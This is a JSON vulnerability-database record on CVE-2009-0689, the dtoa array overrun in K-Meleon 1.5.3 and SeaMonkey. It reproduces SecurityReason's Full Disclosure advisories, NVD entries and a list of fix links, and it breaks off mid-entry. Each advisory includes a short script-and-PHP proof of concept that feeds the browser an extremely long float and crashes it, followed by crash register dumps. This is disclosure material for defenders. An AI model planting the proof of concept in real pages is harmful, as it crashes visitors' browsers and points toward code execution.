{"enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2017-11-19T13:24:36", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1563", "CVE-2009-0689"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A769E84172D8627C1FB28EFC5E28E482", "EXPLOITPACK:BAEE9A0461F7CC4E4B3568E7D096BEFB", "EXPLOITPACK:32D2B684D6A2AB9F4EF85B2B51DAB5DC", "EXPLOITPACK:16C37B6C3C517D65315351878DA06F27"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22814", "SECURITYVULNS:DOC:22093", "SECURITYVULNS:DOC:22932", "SECURITYVULNS:DOC:22816", "SECURITYVULNS:VULN:10021", "SECURITYVULNS:DOC:23025", "SECURITYVULNS:DOC:22813", "SECURITYVULNS:DOC:22815", "SECURITYVULNS:DOC:22812", "SECURITYVULNS:DOC:22933"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82822", "PACKETSTORM:83740", "PACKETSTORM:84946", "PACKETSTORM:82824", "PACKETSTORM:89801", "PACKETSTORM:83739", "PACKETSTORM:83737", "PACKETSTORM:84952", "PACKETSTORM:82821", "PACKETSTORM:82823"]}, {"type": "seebug", "idList": ["SSV:67074", "SSV:18465", "SSV:67154", "SSV:18280", "SSV:67075", "SSV:14959", "SSV:18282", "SSV:18283", "SSV:18281", "SSV:11711"]}, {"type": "nessus", "idList": ["SUSE_MOZILLA-NSPR-6630.NASL", "FEDORA_2015-6DEC4E6D5F.NASL", "UBUNTU_USN-871-1.NASL", "SUSE_11_MOZILLA-NSPR-091103.NASL", "SUSE_11_1_MOZILLA-NSPR-091104.NASL", "DEBIAN_DLA-376.NASL", "SUSE_11_0_MOZILLA-NSPR-091104.NASL", "SL_20091027_SEAMONKEY_ON_SL3_X.NASL", "DEBIAN_DSA-1931.NASL", "SUSE_MOZILLA-NSPR-6631.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:66211", "OPENVAS:880851", "OPENVAS:880670", "OPENVAS:1361412562310131176", "OPENVAS:1361412562310122417", "OPENVAS:1361412562310880670", "OPENVAS:136141256231066121", "OPENVAS:1361412562310880851", "OPENVAS:66121", "OPENVAS:136141256231066211"]}, {"type": "ubuntu", "idList": ["USN-871-1"]}, {"type": "centos", "idList": ["CESA-2009:1601"]}, {"type": "threatpost", "idList": ["THREATPOST:DF62052EA2F1372006ACE34D8541F7DB"]}, {"type": "exploitdb", "idList": ["EDB-ID:10185", "EDB-ID:33058", "EDB-ID:33480", "EDB-ID:33312", "EDB-ID:10380", "EDB-ID:33363", "EDB-ID:33479", "EDB-ID:10184", "EDB-ID:10187", "EDB-ID:10186"]}, {"type": "opera", "idList": ["OPERA:942"]}, {"type": "redhat", "idList": ["RHSA-2014:0312", "RHSA-2009:1601"]}, {"type": "freebsd", "idList": ["4B3A7E70-AFCE-11E5-B864-14DAE9D210B8"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1998-1:6C47A"]}, {"type": "fedora", "idList": ["FEDORA:98D276087D46"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1601"]}], "modified": "2017-11-19T13:24:36", "rev": 2}, "vulnersScore": 6.5}, "bulletinFamily": "exploit", "enchantments_done": [], "href": "https://www.seebug.org/vuldb/ssvid-67076", "id": "SSV:67076", "sourceHref": "https://www.seebug.org/vuldb/ssvid-67076", "description": "No description provided by source.", "type": "seebug", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "lastseen": "2017-11-19T13:24:36", "references": [], "modified": "2014-07-01T00:00:00", "reporter": "Root", "status": "cve,poc", "viewCount": 8, "published": "2014-07-01T00:00:00", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "title": "K-Meleon 1.5.3 - Remote Array Overrun", "sourceData": "\n From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/222\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - K-Meleon 1.5.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/72\r\n\r\n\r\n- --- 0.Description ---\r\nK-Meleon is an extremely fast, customizable, lightweight web browser\r\nbased on the Gecko layout engine developed by Mozilla which is also used\r\nby Firefox. K-Meleon is free, open source software released under the\r\nGNU General Public License and is designed specifically for Microsoft\r\nWindows (Win32) operating systems.\r\n\r\n\r\n- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. K-Meleon has the same\r\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\r\nFirefox 3.5.4 and fix\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\r\nis possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nK-Meleon will crash with\r\n\r\nUnhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access\r\nviolation reading location 0x0bc576ec.\r\n\r\n01800754 mov eax,dword ptr [ecx]\r\n\r\nEAX 00000002 \r\nECX 0BC576EC \r\nEDI 028FEB51 \r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number "CVE-2009-1563". Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on "CVE-2009-0689". After some time Mozilla Foundation\r\nSecurity Advisory\r\n("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)\r\nwas updated with note :\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\r\nalgorithm is not optimal and allows remote Denial of Service in Firefox\r\n3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o\r\nl8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw\r\n=Zqoe\r\n-----END PGP SIGNATURE-----\r\n\n "}

{"cve": [{"lastseen": "2020-10-03T11:54:11", "description": "Array index error in the (1) dtoa implementation in dtoa.c (aka pdtoa.c) and the (2) gdtoa (aka new dtoa) implementation in gdtoa/misc.c in libc, as used in multiple operating systems and products including in FreeBSD 6.4 and 7.2, NetBSD 5.0, OpenBSD 4.5, Mozilla Firefox 3.0.x before 3.0.15 and 3.5.x before 3.5.4, K-Meleon 1.5.3, SeaMonkey 1.1.8, and other products, allows context-dependent attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a large precision value in the format argument to a printf function, which triggers incorrect memory allocation and a heap-based buffer overflow during conversion to a floating-point number.", "edition": 3, "cvss3": {}, "published": "2009-07-01T13:00:00", "title": "CVE-2009-0689", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0689"], "modified": "2018-11-02T10:29:00", "cpe": ["cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/o:freebsd:freebsd:6.4", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/o:netbsd:netbsd:5.0", "cpe:/o:freebsd:freebsd:7.2", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/o:openbsd:openbsd:4.5", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:k-meleon_project:k-meleon:1.5.3", "cpe:/a:mozilla:seamonkey:1.1.8"], "id": "CVE-2009-0689", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0689", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:stable:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:release_p4:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.2:stable:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:release_p3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:release_p5:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:release_p2:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:4.5:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.2:pre-release:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:release:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:k-meleon_project:k-meleon:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:54:13", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2009-0689. Reason: This candidate is a duplicate of CVE-2009-0689. Certain codebase relationships were not originally clear. Notes: All CVE users should reference CVE-2009-0689 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.", "edition": 2, "cvss3": {}, "published": "2009-10-29T14:30:00", "title": "CVE-2009-1563", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2009-1563"], "modified": "2009-12-19T06:54:00", "cpe": [], "id": "CVE-2009-1563", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1563", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "packetstorm": [{"lastseen": "2016-12-05T22:21:23", "description": "", "published": "2009-11-20T00:00:00", "type": "packetstorm", "title": "SeaMonkey 1.1.0 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-20T00:00:00", "id": "PACKETSTORM:82821", "href": "https://packetstormsecurity.com/files/82821/SeaMonkey-1.1.0-Remote-Array-Overrun.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- - Dis.: 07.05.2009 \n- - Pub.: 20.11.2009 \n \nCVE: CVE-2009-0689 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- - SeaMonkey 1.1.18 \n \nFixed in: \n- - SeaMonkey 2.0 \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/71 \n \n \n- --- 0.Description --- \nThe SeaMonkey project is a community effort to develop the SeaMonkey \nall-in-one internet application suite (see below). Such a software suite \nwas previously made popular by Netscape and Mozilla, and the SeaMonkey \nproject continues to develop and deliver high-quality updates to this \nconcept. Containing an Internet browser, email & newsgroup client with \nan included web feed reader, HTML editor, IRC chat and web development \ntools, SeaMonkey is sure to appeal to advanced users, web developers and \ncorporate users. \n \n \n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code \nexecution) --- \nThe main problem exist in dtoa implementation. SeaMonkey has the same \ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in \nFirefox 3.5.4 and fix \n \nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42 \n \nhas been used to patch SeaMonkey 2.0. \n \nThis flaw has been detected in may 2009 and signed SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nbut fix for SREASONRES:20090625, used by openbsd was not good. \nMore information about fix for openbsd and similars SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nWe can create any number of float, which will overwrite the memory. In \nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it \nis possible to call 16<= elements of freelist array. \n \n \n- --- 2. Proof of Concept (PoC) --- \n \n- ----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"9\",299999); ?>; \n</script> \n- ----------------------- \n \nIf we use SeaMonkey to see this PoC, SeaMonkey will crash. For example \n \n- ----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"1\",296450); ?>; \n</script> \n- ----------------------- \n \n127# gdb seamonkey-bin seamonkey-bin.core \n... \n#0 0x28df0ecb in ?? () \n... \n(gdb) i r \neax 0x0 0 \necx 0x2 2 \nedx 0xbfbfd2fc -1077947652 \nebx 0x28da9b6c 685415276 \nesp 0xbfbfd2ac 0xbfbfd2ac \nebp 0xbfbfd2c8 0xbfbfd2c8 \nesi 0xb 11 \nedi 0xb 11 \neip 0x28df0ecb 0x28df0ecb \n... \n \nesi = esi = 11 \n \n \n- --- 3. SecurityReason Note --- \n \nOfficialy SREASONRES:20090625 has been detected in: \n- - OpenBSD \n- - NetBSD \n- - FreeBSD \n- - MacOSX \n- - Google Chrome \n- - Mozilla Firefox \n- - Mozilla Seamonkey \n- - KDE (example: konqueror) \n- - Opera \n- - K-Meleon \n \nThis list is not yet closed. US-CERT declared that will inform all \nvendors about this issue, however, they did not do it. Even greater \nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed \nthat this vulnerability was only detected in Mozilla Firefox, but nobody \nwas aware that the problem affects other products like ( KDE, Chrome ) \nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation \nSecurity Advisory \n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\") \nwas updated with note : \n\"The underlying flaw in the dtoa routines used by Mozilla appears to be \nessentially the same as that reported against the libc gdtoa routine by \nMaksymilian Arciemowicz ( CVE-2009-0689)\". \nThis fact ( new CVE number for Firefox Vulnerability )and PoC in \njavascript (from Secunia), forced us to official notification all other \nvendors. We publish all the individual advisories, to formally show all \nvulnerable software and to avoid wrong CVE number. We do not see any \nother way to fix this issue in all products. \n \nPlease note: \nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa \nalgorithm is not optimal and allows remote Denial of Service in Firefox \n3.5.5 giving long float number. \n \n \n- --- 4. Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n- --- 5. Credits --- \nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com. \n \n \n- --- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n- --- 7. Contact --- \nEmail: \n- - cxib {a.t] securityreason [d0t} com \n- - sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- - http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.pl/ \n-----BEGIN PGP SIGNATURE----- \n \niEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D \nZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB \n=JY6k \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82821/seamonkey-overrun.txt"}, {"lastseen": "2016-12-05T22:15:33", "description": "", "published": "2009-11-20T00:00:00", "type": "packetstorm", "title": "K-Meleon 1.5.3 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-20T00:00:00", "id": "PACKETSTORM:82822", "href": "https://packetstormsecurity.com/files/82822/K-Meleon-1.5.3-Remote-Array-Overrun.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n[ K-Meleon 1.5.3 Remote Array 